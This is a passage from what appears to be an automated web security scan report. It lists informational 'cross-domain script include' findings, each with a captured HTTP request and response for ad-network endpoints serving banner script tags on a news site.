Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=...[SNIP]...

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 336

<script LANGUAGE="JavaScript1.1" SRC="http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90?http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/"></script>

18.3. http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aDmNYDUArTPEj5PcrsQWUy0tFmWPjM4sJ4YbvIVmqt4Av7PmMC2Hrp0WUZcpt2w4PvT3GMgTsQdVVrkSPUyTWFWTrBP2U2nWEnvVqJdPEZbLQVbAPFupRWYiWGUT5Uymodaq0EqM2tYCQVrZc4AnZapdTpTWbdXUfkUcFXxq6enq/2401306/wrapper1.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=...[SNIP]...

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 346

<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90?http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/">

</script>

18.4. http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aDmNYDUArTPEj5PcrsQWUy0tFmWPjM4sJ4YbvIVmqt4Av7PmMC2Hrp0WUZcpt2w4PvT3GMgTsQdVVrkSPUyTWFWTrBP2U2nWEnvVqJdPEZbLQVbAPFupRWYiWGUT5Uymodaq0EqM2tYCQVrZc4AnZapdTpTWbdXUfkUcFXxq6enq/2401306/wrapper1.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=...[SNIP]...

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 343

<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90?http://a.tribalfusion.com/h.click/a4mNYDprnEXG7TXcM30cvumTFV2bZbRTFvFVmU5REM2QsvqQdUM1dBqV6nM4cB3YbrZcVAyw4AU8QPrG3W3n1dBKmd6o4PBP5GngTGJbVsniPPnmUWFWUbFP3ripVanoTTYaSa3LSGjZdPbuxRtYdVVfP4FTtmWqOTHqIxq6DWP/">

</script>

18.5. http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aomN7ET6np2sJ1YUrITPip5Pn6QPrE4WMo1t3LpdEw56nW5cj8Tsn7WcfiPAFwTWMPWFjP3rAwVEUrTaBcPTBZdSsJZbRrEvRdMdUVM54FXuntqo0aqp2tMBSGjA4AnZaoWXqTd36Yrn7XrB9XqepRUvZcTbQ4WtUWosZbAxdcios/2401306/wrapper1.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=apnbTgRkP6sAeCnr7aThQZcqPBHtrraZbSTRTZaxKPOHouZaJVIbQTSsBUPqmi4nEtfb83Zcvec3S8iUvCOxoTGpb74mTNHJQwaKvcNy6crTZaEDIyKsscnXKMV6dVS8Cjj39a44AW1RJsMFxcrNOalv5cGbdo53CJ3hSJeZbwgoZdoPQvB5XBWaxBldqc0yx46ZcRTwOnpIEM67ujH5rk8FCBUxUTVho7T8IJUMTYZd0TwwCm3rUsvAfXeyPY3GrFVTMo0OPnkPqLNfy7lucPe6JOaARob4cdJG8W6oycO0gCTFlhcLuNw9jFtSed6uw6r0tHISg1pRvsWAO7MY3Lr2uFxDUtZcyTAckJYAI3d3XPSQriZdEE06yPgwHHqlv652SvRZceLbX88lCpQEtnNoTnYu8efdTYcJkNCsd

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 342

<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90?http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/">

</script>

18.6. http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aomN7ET6np2sJ1YUrITPip5Pn6QPrE4WMo1t3LpdEw56nW5cj8Tsn7WcfiPAFwTWMPWFjP3rAwVEUrTaBcPTBZdSsJZbRrEvRdMdUVM54FXuntqo0aqp2tMBSGjA4AnZaoWXqTd36Yrn7XrB9XqepRUvZcTbQ4WtUWosZbAxdcios/2401306/wrapper1.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=apnbTgRkP6sAeCnr7aThQZcqPBHtrraZbSTRTZaxKPOHouZaJVIbQTSsBUPqmi4nEtfb83Zcvec3S8iUvCOxoTGpb74mTNHJQwaKvcNy6crTZaEDIyKsscnXKMV6dVS8Cjj39a44AW1RJsMFxcrNOalv5cGbdo53CJ3hSJeZbwgoZdoPQvB5XBWaxBldqc0yx46ZcRTwOnpIEM67ujH5rk8FCBUxUTVho7T8IJUMTYZd0TwwCm3rUsvAfXeyPY3GrFVTMo0OPnkPqLNfy7lucPe6JOaARob4cdJG8W6oycO0gCTFlhcLuNw9jFtSed6uw6r0tHISg1pRvsWAO7MY3Lr2uFxDUtZcyTAckJYAI3d3XPSQriZdEE06yPgwHHqlv652SvRZceLbX88lCpQEtnNoTnYu8efdTYcJkNCsd

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 348

<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90?http://a.tribalfusion.com/h.click/aHmN7ERU7NYEZbo4Tjl4E71nTBAXF3dWHZbUn6rKpGvooHYH3TZbf3dIo5AjIpbbZaYsQW1VUV0VbpmaBR5bZbUWFnEW6v1REYQQGQsStZbr1tBxWmbN4c3UXFUZbVmqs46r9PPMC2dBq1HYZdmHEo3m3W5G3fUVY6Vc78PSYJxdcGNO/">

</script>

18.7. http://ad.afy11.net/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38178276&rk1=15197426&rk2=1296251850.36&pt=0 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=AZ7s9B85IkyRNDgbVDU-vg; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEDAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; f=AgECAAAAAAALqJELwX83TQyokQsDfjdN

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: text/html; charset=utf-8
Content-Length: 750
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

<script type="text/javascript" src="http://ad.afy11.net/sracl.js"></script>

<div style="width: 300px; height: 250px; border-width: 0px;"><script language="JavaScript"> var zflag_nid="951"; var zfl
...[SNIP]...
</script> <script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.8. http://ad.afy11.net/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=86551686&rk1=26330496&rk2=1296251850.357&pt=0 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=AZ7s9B85IkyRNDgbVDU-vg; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEDAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; f=AgECAAAAAAALqJELwX83TQyokQsDfjdN

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: text/html; charset=utf-8
Content-Length: 1767
Set-Cookie: c=AQEEAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAxZEByjtDTQAAAAAAAAAAAAAAAAAAAADUO0NNAQABAHVvC9XoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADfTrnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

<script type="text/javascript" src="http://ad.afy11.net/sracl.js"></script>

<div style="width: 300px; height: 250px; border-width: 0px;">
<IFRAME SRC="http://ad.doubleclick.net/adi/N3671.CentroNetw
...[SNIP]...
lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!;ord=2803508621?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3671.CentroNetwork/B5159652.2;abr=!ie;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!;ord=2803508621?">
</SCRIPT>
...[SNIP]...

18.9. http://ad.afy11.net/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38178276&rk1=15197426&rk2=1296251850.36&pt=0 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=AZ7s9B85IkyRNDgbVDU-vg; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEDAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; f=AgECAAAAAAALqJELwX83TQyokQsDfjdN

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: text/html; charset=utf-8
Content-Length: 1767
Set-Cookie: c=AQEEAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADy5OcAyjtDTQAAAAAAAAAAAAAAAAAAAABbc0NNAQABAHVvC9XoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADfTrnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

<script type="text/javascript" src="http://ad.afy11.net/sracl.js"></script>

<div style="width: 300px; height: 250px; border-width: 0px;">
<IFRAME SRC="http://ad.doubleclick.net/adi/N3671.CentroNetw
...[SNIP]...
MLXiZYn+lZl1GiONbajXgP8MZvoIMUmiqFAfe1Dh257IAF8HzcAk7HK6p+9cgEE=!;ord=2632647138?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3671.CentroNetwork/B5159652.2;abr=!ie;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=fynY-cEEjEyoo-jgd2DP245a7fJlfzaqIP7RGO1EN1pCMLXiZYn+lZl1GiONbajXgP8MZvoIMUmiqFAfe1Dh257IAF8HzcAk7HK6p+9cgEE=!;ord=2632647138?">
</SCRIPT>
...[SNIP]...

18.10. http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.CentroNetwork/B5159652.2

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N3671.CentroNetwork/B5159652.2;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!;ord=2803508621? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=86551686&rk1=26330496&rk2=1296251850.357&pt=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
